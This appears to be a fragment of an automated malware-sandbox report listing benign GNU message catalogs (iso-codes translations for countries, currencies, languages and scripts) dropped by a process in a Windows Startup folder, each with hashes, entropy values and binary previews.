                                                                                                    SHA1:F2D95E8FB926F5F3BABA4D147765B3805469DF70
                                                                                                    SHA-256:EDDBD36F1D975F36860CCEFB799B8E1AE9C6821AA5585FD0AF573047506C4367
                                                                                                    SHA-512:FC146F8A94450D71EA42021A8BCAF0BFCF72A8CFDDB9E944E98AB02AD3D93D568A79EDB5FE3EB30D4E44382551A16F95552CEF480F34067EDD5C2E5C4A71CBB7
                                                                                                    Malicious:false
                                                                                                    Preview:................,v......<........:.......:.......:.......;.......;.......;......!;....../;......4;......9;......B;......G;......O;......X;......d;......i;......q;......{;.......;.......;.......;.......;.......;.......;.......;.......;.......;.......;.......;.......;.......<.......<......$<......3<......8<......D<......J<......X<......^<......k<......q<......z<......~<.......<.......<.......<.......<.......<.......<.......<.......<.......<.......<.......<.......<.......<.......=.......=......"=......-=......9=......G=......P=......\=......m=.......=.......=.......=.......=.......=.......=.......=.......=.......=.......=.......>.......>.......>......!>.......>......8>......G>......U>......e>......p>......|>.......>.......>.......>.......>.......>.......>.......>.......>.......>.......>.......>.......>.......?.......?.......?.......?......(?......0?......7?......>?......G?......W?......o?......|?.......?.......?.......?.......?.......?.......?.......?.......?.......?.......?.......?......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 32 messages, Project-Id-Version: iso_3166-3 '\320\221\321\200\321\213\321\202\320\260\320\275\321\201\320\272\321\226\321\217 \321\202\321\215\321\200\321\213\321\202\320\276\321\200\321\213\321\226 \321\236 \320\220\320\275\321\202\320\260\321\200\320\272\321\202\321\213\320\264\320\267\320\265'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3661
                                                                                                    Entropy (8bit):5.590298325450756
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rLf3H1HItnldZ+vGqIfdvqN5CoUZAtzBZ1AGRPiYG3I1eBwIiDWVddX0FTJPQvzr:rLvADZ+yaCoMWzT1IVSUdVWTJW
                                                                                                    MD5:98802D713898666E89D9F1806A09D2EC
                                                                                                    SHA1:3145B7F9D3EFF93CDB6A65CBC0A3FA87C01457B4
                                                                                                    SHA-256:358F2DB07FB16402124DA3E4BFEB19A1E49EE294B55F02E8D147AFA587CF13D3
                                                                                                    SHA-512:637E93DC8EAC53F389BB0B60B06CEC3C165BC2EBA339429ED68A30652BACD99BCEA471F59A1CCAA1D69A2005DB72715EF1E128C1DAFA78DFA7068DC696FB6862
                                                                                                    Malicious:false
                                                                                                    Preview:........ ...........+.......................).......*...........:.../...W...........................................)...........................9.......I.......X.......m.......z...!....................................... .......)...........5... ...N.......o...2...{...+...............&.......A......._...V...W.......".......L...1.......~..."...............$.......@.......X...0...D.......).......................>...4.......s...........Q...............$...........@...!...K...9...m...S.......1.......>...-.......l...J.......^....................... ....................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 180 messages, Project-Id-Version: iso_4217 '\320\240\320\260\320\267\320\273\321\226\320\272\320\276\320\262\320\260\321\217 \320\260\320\264\320\267\321\226\320\275\320\272\320\260 ADB'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):12256
                                                                                                    Entropy (8bit):5.283308785249877
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:fqFbD8kCemeXeh6VRyK0G/2LCntxtz+VVHJHMAYNcVmQHs1ZbBlvA3MdspPwEUgG:ShqeJeh6TL0G/Uo/tzcVpJY4s1Zbbyfi
                                                                                                    MD5:01B1409616A3A5E9EDC03AF35039A5B3
                                                                                                    SHA1:0A6B33480230DE424EA1F5CBAF52F210616CCFE0
                                                                                                    SHA-256:2D6C13DC593BDE897C4C03E128962F37BC02F62D851506452249A7AF7BA16773
                                                                                                    SHA-512:E7D8FDEC2E3B85201B1530AA0845D015619FB77CC17349204F524A25794B362FC15F94DC26BDC43BD7D619A6BEBBAC3B6FBDA2AAF3781868795D1AFB128C0324
                                                                                                    Malicious:false
                                                                                                    Preview:........................\....... .......!.......5.......=.......L.......[.......i.......w...........................................................................................1...!...3...S...9.......7...................................$.......2.......B.......Q.......[.......m.......}...........0...................................................................9.......F.......M.......Z.......`.......o.......u...............................................................................................................%.......-.......;.......I.......Z.......b.......p.......}.......................................................................................................................................(.......5.......?.......D.......T.......b.......t...........!...................................................................................1.......D.......V.......i.......r.......................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 368 messages, Project-Id-Version: iso_639-3 '\320\260\320\261\321\205\320\260\320\267\321\201\320\272\320\260\321\217'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):18766
                                                                                                    Entropy (8bit):5.075606421790236
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:tV5e1PW7dDjeCpkutJWm2YxN3sOyb1N0m+cCSWrg5:tVoIeanPWPN0xc2rg5
                                                                                                    MD5:A50098DC7344E9B1E8DDDCCE8A076E98
                                                                                                    SHA1:1B071DB5C10A1E9D2FCCA104BE015E7CB3A4FD82
                                                                                                    SHA-256:EA7E4C947451E63F0315B8C45B1817E7F70BB2F45C23E9FCE3EB69C6E60C16DA
                                                                                                    SHA-512:EDB5AEEF2C5B0C8A374DA4BAAD1C6F1C9DCDC59559C81817120C0DA3E503B54315A88769A71AEBB15B1FC02AFE67166B4E12BBECE03EFCB987096EBCEEB5E617
                                                                                                    Malicious:false
                                                                                                    Preview:........p...............................................................................................................................'...............5.......?.......G.......N.......W.......`.......g.......o.......v.......}................................................................................................................................ ....... ....... ....... ......! ......( ......0 ......6 ......= ......E ......N ......U ......^ ......f ......o ......x ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... .......!.......!.......!.......!.......!......#!......)!......G!......M!......V!......f!......k!......~!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!......."......."......."......."......."......="......X"......a"......g"......j"......w"......."......."......."......."......."..#....".......".......".......".......".......".......#.......#......%#......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 116 messages, Project-Id-Version: iso_639-5 '\320\260\321\204\321\200\320\260\320\267\321\226\320\271\321\201\320\272\321\226\321\217 \320\274\320\276\320\262\321\213'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9437
                                                                                                    Entropy (8bit):5.21823269590767
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:4SDx1EDqvqEji9ESE0BfNcaKsvx0NRGsB0duUVs3Kzc3tekTUsFAIAjVA8KLVbsM:XPJq/E0BfNcaKsvx0NRGsB0duUVsazc7
                                                                                                    MD5:8B588E45EB25BB8041CAF8F11322B758
                                                                                                    SHA1:E88B7CFDA338AF7D1FA8A0EF896267718E0DA45D
                                                                                                    SHA-256:EF5AFC22BB18FD818DCEA697E16E88C1A591464760FC62577A67109430A8CD12
                                                                                                    SHA-512:07F5AC1D72B962415993BE1B363F70126542BEC7FFB2188080329EF93676973D1F870F8A254326651404D23BD1C0B7D8688DB48E69DBE3526FA80181B01BDEDD
                                                                                                    Malicious:false
                                                                                                    Preview:........t...............\............................................... .......5.......F.......W.......h.......{...............................................................&.......9.......I.......Y.......i.......y...................................!.......#...................2.......C.......T.......g.......x...$.......#.......%...........................".......:...#...P.......t.......................................................................*.......8.......H.......`.......w...............................................................................7.......G.......X.......h.......|...............................................................1.......J.......[.......l...............................................................................'.......9.......P.......a.......r...............................................................(.......9.......H.......Y.......j...........................#...........................................3...!...S.......u...........!...
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_15924 '\320\220\320\264\320\273\320\260\320\274\321\201\320\272\320\260'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2003
                                                                                                    Entropy (8bit):5.290363468470332
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VlVO4J5hiJ6xwE4j1K+k+DESlUFk5NFV+coUYxfhf+qmwK:3VTJ5h+MwJNwSlqKFIN/Y
                                                                                                    MD5:F01B76B57D21F9AA924012A0E17BA8F0
                                                                                                    SHA1:6F1C1BEA3BF3DF9F967F1757B59BD4B6942FBE5B
                                                                                                    SHA-256:7A4D0E7484592B5B20E7569EAFE6812A64D63D3BC0340DA3E885C31B719B92D0
                                                                                                    SHA-512:46FB762A1FEE86517A9BBB87CFF8D307890AE61C114A73E38879B758B3A8DE0F43559BB13600D67510C2164ED65FE72C9EBD45E82219982212E4FD70DD6917AB
                                                                                                    Malicious:false
                                                                                                    Preview:....................)...................................................................................................................'...............4.......=.......D.......M.......V.......\.......|.......................................................................................................................................................).......6.......E...%...V.......|.......................................................................).......:.......Z.......m................................................................................................................................................................................................................Adlam.Afaka.Arabic.Armenian.Balinese.Bengali.Braille.Caucasian Albanian.Cherokee.Coptic.Cyrillic.Egyptian hieroglyphs.Gothic.Greek.Gujarati.Hebrew.Hiragana.Katakana.Khmer.Korean (alias for Hangul + Han).Lao.Latin.Mayan hieroglyphs.Mongolian.Old Persian.Runic.Tamil.Telugu.Thai.Tibetan.Project-Id-Version: iso_15
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-1 '\320\220\321\204\320\263\320\260\320\275\320\270\321\201\321\202\320\260\320\275'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):28945
                                                                                                    Entropy (8bit):5.235690201180512
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:0oX+9Xl48fmsWP48WAICRKiMH4dP3kPyiR/LtW:bsXl48cdg4dP3cXi
                                                                                                    MD5:D57FF900DAFC190DAB038B5CD5256257
                                                                                                    SHA1:0FDCA74D17F8EA97A3B9FD0E812F730E2B1FC340
                                                                                                    SHA-256:5E21F0EBF58ABBF67CD1BB2D1AEEC0C5603FB786771F12CBC9DD78A542201346
                                                                                                    SHA-512:79EC4FEFA82D4CE5C7E0AE60855B551F3619C2A565EAE97E9622C44CC6229FA0BA4D92ACB17EE689E5B0066E363D6F72B215B2C7CF7B06D245CC8C76C92C5E97
                                                                                                    Malicious:false
                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 319 messages, Project-Id-Version: iso_3166-2 '\320\220\320\261\321\203 \320\224\320\260\320\261\320\270'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):15883
                                                                                                    Entropy (8bit):5.087374222254468
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:TPZCnOjFljhpeLK/yZu6+g4+kbUksmh/mJiaQnRV+uOOE:TwOjT8y+kbUnM+7OE
                                                                                                    MD5:449C6ED46EDBE76C24B41CD2BE527047
                                                                                                    SHA1:C280D6C0A226B1382FA4D84B5B2B392E7B4DB304
                                                                                                    SHA-256:45FBF65DA90EF0A79B3B0979520016E31EBCB7124CA34FAC1EBB9393817CD829
                                                                                                    SHA-512:0FAE353D0105667A7B428C1A375932C2FAB8047BF9F76BF71EDA455BC16BA36C7F00206B07971FE761B7801CDFC02A2647A90541265DB3D0A5653596AADFBDC6
                                                                                                    Malicious:false
                                                                                                    Preview:........?............................................................................................................... .......'......./.......8.......>.......I.......N.......h.......o.......v.......~...............................................................................................................................................(.......4.......A.......H.......N.......W.......b.......k.......s...............................................................................................................................$.......1.......7.......=.......E.......Z.......f.......o.......w.......~...............................................................................................................................................$.......,.......6.......C.......O.......Y.......c.......o.......z...............................................................................................................................................................'.......,.......5.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 32 messages, Project-Id-Version: iso_3166-3 '\320\221\321\200\320\270\321\202\320\260\320\275\321\201\320\272\320\270 \320\260\320\275\321\202\320\260\321\200\320\272\321\202\320\270\321\207\320\265\321\201\320\272\320\270 \321\202\320\265\321\200\320\270\321\202\320\276\321\200\320\270\320\270'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3381
                                                                                                    Entropy (8bit):5.452959027597132
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rLf3BxOl+vGqIfdvqN5CoUA0fxaDpOVe8ATkIUESciVmSD3hO4XI6ik:rLvBxe+yaCoWSOV8TkptOo
                                                                                                    MD5:EFB4F2078E9ADF747FA60F227AF70F1F
                                                                                                    SHA1:BD380A75FC6B0CA0525D7ED7600B56DF81A48A0D
                                                                                                    SHA-256:6A34BF1F99CB4C04E88CA8184BE55424705B95C18C94ACB8737C7365F21B6485
                                                                                                    SHA-512:47B4797314EF453686EE974A1965F27D33F5AC2B60842E2926E918D81B12C0DFE08232E7A848D4783C985C90853D02CC96B9A627FFE26E8CC15E016EF505AD6E
                                                                                                    Malicious:false
                                                                                                    Preview:........ ...........+.......................).......*...........:.../...W...........................................)...........................9.......I.......X.......m.......z...!....................................... .......)...........5... ...N.......o...2...{...+.......................@.......[...........+...1...E...d...w...........#...............(...'...%...P...H...v...>.......)...........(.......D.......`...................'.......(.......#...........).......4...0...L...^...}...).......;...........B...`...X...^....................... ....................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 394 messages, Project-Id-Version: iso_639-3 '\320\220\320\261\321\205\320\260\320\267\320\272\320\270'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):24471
                                                                                                    Entropy (8bit):5.222805655950827
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:sVB0D35tSiNdGY9/e0Ja0wRD3bktKjHad5I/XcLQ/1WI54OJMzAw1AHkq7mUprda:V5Q2EgSlAtKHVkERJMRcPprd5/dSXoJY
                                                                                                    MD5:2B941067DCCB9B569EB5893FDBFD22BF
                                                                                                    SHA1:D40A24EC3A3D2F06A7B03B630040E37DFB8C3CDC
                                                                                                    SHA-256:2BFE5A434E9A05AC96CAF1C633B3F2CCA577DAF60312923CD54E9C62CE75BD1D
                                                                                                    SHA-512:6E2160E4309CEC3176FEF6987B2B60C8E6A84E52295601D6ACA2199997E68E5E6DEA77626BE57B2451A600C4E931BAB248B56A769FB2E1259B87356F4E51A54D
                                                                                                    Malicious:false
                                                                                                    Preview:................l...............0!......1!......;!......D!......J!......R!......Y!......^!......g!......q!......~!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!......."...... "....../"......9"......Y"......v"......~".......".......".......".......".......".......".......".......".......".......".......".......#.......#.......#......&#.......#......6#......=#......M#......U#......\#......a#......l#......{#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......'$......:$......L$......T$......\$......k$......{$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......%.......%.......%......%%......-%......@%......T%......e%......l%......t%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&......)&......>&......R&......f&......|&.......&.......&.......&......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_3166-1
                                                                                                    Category:dropped
                                                                                                    Size (bytes):526
                                                                                                    Entropy (8bit):5.281829884387048
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:i40ExxLtt02UkI06/9/xtLLZ/4FnIXmBQWiOWRl:R0ijt0UIttB/FXmGRl
                                                                                                    MD5:29CE07252BBB552E6118471C040D22B1
                                                                                                    SHA1:081D816882ED408D373FB3B2F667B3E252538E96
                                                                                                    SHA-256:FD5201C69D6B84A55D9E850C08919D1F0EEDBA7CE3507FD58D7629CFDB2852B5
                                                                                                    SHA-512:852B0CFF13D06346F4B788DFE00246507659978DA3A98BDE49D092526A280F744A1F3E5F34ABD5FBE62587EDD7119D226AF63B8DF9B8775A573AEDB5C38C3C32
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8.......9................Project-Id-Version: iso_3166-1.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2017-12-26 20:03+0000.Last-Translator: Chris Leonard <cjlhomeaddress@gmail.com>.Language-Team: Bislama <https://hosted.weblate.org/projects/iso-codes/iso-3166-1/bi/>.Language: bi.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.Plural-Forms: nplurals=2; plural=n != 1;.X-Generator: Weblate 2.19-dev..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 421 messages, Project-Id-Version: iso_3166-1 '\340\246\206\340\246\253\340\246\227\340\246\276\340\246\250\340\246\277\340\246\270\340\247\215\340\246\244\340\246\276\340\246\250'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):35751
                                                                                                    Entropy (8bit):4.952700643634092
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:sxqI3ItU++YozmotmsWP4XWAIw6kNwcOX42dszX8ZrX6HxHariXdRXdydpdftCds:4qkItH+z9HT/HErurGjV281MMPREyKxO
                                                                                                    MD5:7F885067D2CD984B8835B7DEA149B84A
                                                                                                    SHA1:1BF8FE8DEC3107FCAF48AA1C5B79E1088BC2E464
                                                                                                    SHA-256:6AC8418F3C54F03ED7431CD92ECB809B60FAC647AA728C6D91169C8CDF13EF8C
                                                                                                    SHA-512:4553A82F3491EC793D6DE95162749CEED796E13D81F2DA64A70DE3B239DD0E8F5B05904BE87E36E4E8E0ADF3FDA8119BBD995F4584473B9D9F70390BF53A181F
                                                                                                    Malicious:false
                                                                                                    Preview:................D...3...l.......8#......9#......E#......M#......U#......d#......l#......s#......|#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$.......$.......$......&$.......$......5$......;$......C$.. ...J$......k$......s$.. ....$.......$.......$.......$.......$.......$.......%.......%......1%......:%......G%......O%......Z%......c%......l%......s%.......%.......%.......%.......%.......%.......%.......%.......%.......%..,....&......@&......H&..%...N&......t&.......&.......&.......&.......&.......&.......&.......&.......&..%....&..,....&.."..."'..*...E'......p'......x'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(......#(..'...1(..$...Y(......~(.......(.......(.......(.......(.......).......).......)......#)......1)......B)......R)......n)......t).......).......).......).......).......).......).......).......).......).......).......).......).......).......*.......*.......*.......*......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 '\340\246\254\340\247\215\340\246\260\340\246\277\340\246\237\340\246\277\340\246\266 \340\246\206\340\246\250\340\247\215\340\246\237\340\246\276\340\246\260\340\247\215\340\246\225\340\246\237\340\246\277\340\246\225 \340\246\205\340\246\236\340\247\215\340\246\232\340\246\262'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4015
                                                                                                    Entropy (8bit):5.124582486843154
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:qD0vWKyBoZ52XoQUXggt7X6G2Z2XhZ+5hC03XampXsYPdIPl:qDyWWZAXbUXxt7XDXh+Y03XdpXTPdIPl
                                                                                                    MD5:D5538B057BC68DEF3BF28E3BB7255441
                                                                                                    SHA1:514E34ED6AED503B19682122F5796B7895B0B485
                                                                                                    SHA-256:3D47986D890D3EBB7F54EEC4C7FCEDE75AAAAC8DB400D050A504C8F5D7B64BF7
                                                                                                    SHA-512:6DA7A7718FCA3CC230173C9A99FDAE39E65017CEEFBD062466F96E4E8F837371322A3B3DFD5E789B8E7C0D28CB2C3722094170A1C40D48F82CF6779055B000E8
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c...........m.......G.......u..._...........Z...[...............H...2...[...........?.......6.......^...%...Y.......H......."...'...1...J...I...|...%.......".......\.......,...l...>...............+.......................A...-...]...o...+...............1...}........................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 86 messages, Project-Id-Version: iso_4217 '\340\246\206\340\246\253\340\246\227\340\246\276\340\246\250\340\246\277'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6448
                                                                                                    Entropy (8bit):4.964126902655644
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:+pTI2t2tEkXX8xT8yPTZl4AviSmlGH7SEhSpJ8QwP3srwB34RgnBZNhfPpTisv+i:hqi8xd//vMkIJ/wdbJxBTxTn
                                                                                                    MD5:FE1BD1DAF874FC2CAF35BBD5D4F359BC
                                                                                                    SHA1:1052B64E21A0067D9FBFADA2CF1D6C6B38DECAAB
                                                                                                    SHA-256:E2861E771529D251F17659424951AFED54A101E447AB169A88B15366D4096A6F
                                                                                                    SHA-512:5D39D431FE12AB79504AC98B31EE42AA479B3D2AA758C2F39B5E29D8EA696C562C4BE09C320E5FE52D1F34E2F45E0A48BF020E5946BF9A371A57729E36DBD7C6
                                                                                                    Malicious:false
                                                                                                    Preview:........V...............|.......x.......y...............................................................................................,.......6.......E.......S.......a.......o.......................................................................................................*.......9.......H.......W.......\.......s...............................................................................................................#.......3.......8.......F.......M.......R.......W.......f.......j.......r.......................................................................................................&.......+.......3.......8.......?.......C.......S......._.......d.......j.......q.......|...............................\.......o...........1.......(.......4...(..."...]...(.......(.......................(...........G...1...f...".......+...............2.......%...I...A...o...%.......(.......7......./...8.......h...................%...............(.......(.......(...@..."...i...........M...
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1626 messages, Project-Id-Version: iso_639-3 '\340\246\217\340\246\260\340\246\277\340\247\237\340\246\276\340\246\260\340\247\207'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):96597
                                                                                                    Entropy (8bit):5.022174400863715
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:GSxPk8KSlRns7ogO8wTQhsAzkOBMtORdMHophosGLhe9O:bKmRjgeMhsAVMetphtGLF
                                                                                                    MD5:4E0A9049356B4AC29C6C3959F23FD330
                                                                                                    SHA1:F8384CEB47C0C8D235DACD50A43FEA3DDD2588E3
                                                                                                    SHA-256:4DF08A70BE96606557A239FAFEBF52D70A826147C60B3744CE06364448A81917
                                                                                                    SHA-512:170E9939208E9DABD7F6C9B92BD6CB47818F360D950BAA81A4303C4CB18F558A5B5C3A0C8C85D777600D919AA10BBC8D8AE112E338B4687A7B829B0E18907FAA
                                                                                                    Malicious:false
                                                                                                    Preview:........Z........2.......e........................................................................................................&......./.......9.......I.......Y.......^.......c.......i.......m.......z..................................................................................................................................................".......(......./.......3.......=.......K.......S.......Y.......`.......g.......l.......s.......w.......}..........................................................................................................................-.......:.......J.......Z.......h.......o.......x.......~.................................................................................................................................................(.......4.......:.......=.......E.......L.......U.......^.......g.......o.......x.......}...........................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 65 messages, Project-Id-Version: iso_639-5 '\340\246\205\340\247\215\340\246\257\340\246\276\340\246\253\340\247\215\340\246\260\340\247\213-\340\246\217\340\246\266\340\247\200\340\247\237 \340\246\255\340\246\276\340\246\267\340\246\276'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5688
                                                                                                    Entropy (8bit):5.0110334511473384
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:davRWydI8fJ0E0C+fICY6zbKPBAVIDeUOUHF8te:cWydb0E0JvWiUHWw
                                                                                                    MD5:B729383D5C811546AED7F2DD99B31880
                                                                                                    SHA1:B2ABCBA4AE95DEC6FFD1F56D7AD3B7320EA954DD
                                                                                                    SHA-256:18346502200F9DC2FE34DB350E372FB3343E5A4F5190EE0BEB9CF23BE1F5BC76
                                                                                                    SHA-512:5EB8306D0BE9F617EDF1826042FA2B03370A3AB05748FBBC4C4024C44D9B7DD42878669969269C9175F43E8CFC521D5D84BBC3F816EA3DB0EA0AA917D70CC29D
                                                                                                    Malicious:false
                                                                                                    Preview:........A.......$...Y...,.......................................................................................G.......\.......u...................................................................!...........9.......J...%...^...............................................................................1.......A.......S.......a.......v............................................................... .......1.......C.......T.......i.......{...............................................................................,.......;.......N.......^.......n...2...9...+...l...........4.......".......%......."...3...+...V...2.......1.......2.......7...........R...%...r...................................%......."...;...K...^...........).......\......."...N...(...q...2.......(.......................;...-...%...i...%......."......."...............2...........H.......h... ...............%.......G......./...4...N...d...".......%.......".......%......."...E..."...h..."..............."......./...........
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 183 messages, Project-Id-Version: iso_15924 '\340\246\206\340\246\246\340\246\262\340\246\276\340\246\256'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):14811
                                                                                                    Entropy (8bit):5.056371814202998
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:dySHxltU4WjV9qWxa5hW8077z1WeCErDk/0KQptraPTdpYxlz/Ys:wgg4WjVDxa5hW80DJY4raPa/Ys
                                                                                                    MD5:3A55B1EB296B01074964F2A8A1CD1616
                                                                                                    SHA1:E5BF9223B60C9211DDC4AEC60051161141D01C2B
                                                                                                    SHA-256:A2FC26BC844FB4F3031F84FDA3879FA0C8D9676A1D725C7B263B1B04D18C97A1
                                                                                                    SHA-512:4B4DCD0578D1611C524CB892EF060F356A46D1866A2AD7C66AD56DA1F3E7031357FF5B468E4A8A52A46CDB910F0F15800A4CD035E64365FFCC5B3E182D1A87A8
                                                                                                    Malicious:false
                                                                                                    Preview:................................x.......y...................?...........................................................................%.......-.......7.......C.......P.......Y.......`.......h.......q.......w.......~.......................................................................................:.......B...&...K.......r...........(...........................................................'.......2.......9.......A.......G.......P.......Y.......s...........,...........................................................(.......9.......O...&...f...........4...........................................................#...............B.......V.......\.......c...#...u...............................................................................!.......'.......0.......9.......G.......L.......S.......Z.......c.......m.......................................................................................*...(...4.......].......f.......n...........-...............!...........................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 10 messages, Project-Id-Version: iso_3166-2 '\340\246\206\340\246\262 \340\246\253\340\247\201\340\246\234\340\246\276\340\246\257\340\246\274\340\246\260\340\246\276\340\246\271'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1161
                                                                                                    Entropy (8bit):5.488987547384928
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:yc7oYFCoi2lYjCtBSt0U3OStw/NMXmGFkcqsWUJosesD88e8f:LLCCYjCf/UeStw75EWUe5gIw
                                                                                                    MD5:590F76D70BFF4F746FCE86A71C3A9996
                                                                                                    SHA1:C0E8A68E3C72426CE301674E43D3935A3C43FB30
                                                                                                    SHA-256:4174CE1D662420DCD08294D662073D930BFB795B5AEBCDD9AD5B1C70A0BE7CC2
                                                                                                    SHA-512:20E3530897BFB8CF8FA14FD0857996DC473C4770C86F4F7CEB2835638470BED149112B7F69818E527685246AD6A85936D6FC08DA33C71BAA2BF8AFD5BC285C60
                                                                                                    Malicious:false
